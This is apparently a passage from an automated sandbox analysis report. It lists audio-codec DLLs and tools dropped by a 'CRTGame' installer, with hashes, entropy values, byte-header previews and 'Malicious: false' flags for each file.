SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\lessmsi\is-K7H11.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\CRTGame\bin\x86\lessmsi\lessmsi-v1.6.91.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	845312
Entropy (8bit):	6.581151900686739
Encrypted:	false
SSDEEP:	24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
MD5:	00C672988C2B0A2CB818F4D382C1BE5D
SHA1:	57121C4852B36746146B10B5B97B5A76628F385F
SHA-256:	4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
SHA-512:	C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	867854
Entropy (8bit):	4.9264497464202694
Encrypted:	false
SSDEEP:	12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:	B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:	1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:	AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:	D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p..........................................................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc..........,..................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68042
Entropy (8bit):	6.090396152400884
Encrypted:	false
SSDEEP:	768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
MD5:	5DDA5D34AC6AA5691031FD4241538C82
SHA1:	22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:	DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:	08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	123406
Entropy (8bit):	6.263889638223575
Encrypted:	false
SSDEEP:	1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
MD5:	B49ECFA819479C3DCD97FAE2A8AB6EC6
SHA1:	1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
SHA-256:	B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
SHA-512:	18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................\|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-BA6TO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-JMEV2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
SSDEEP:	768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:	B162992412E08888456AE13BA8BD3D90
SHA1:	095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:	2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:	078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram\|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
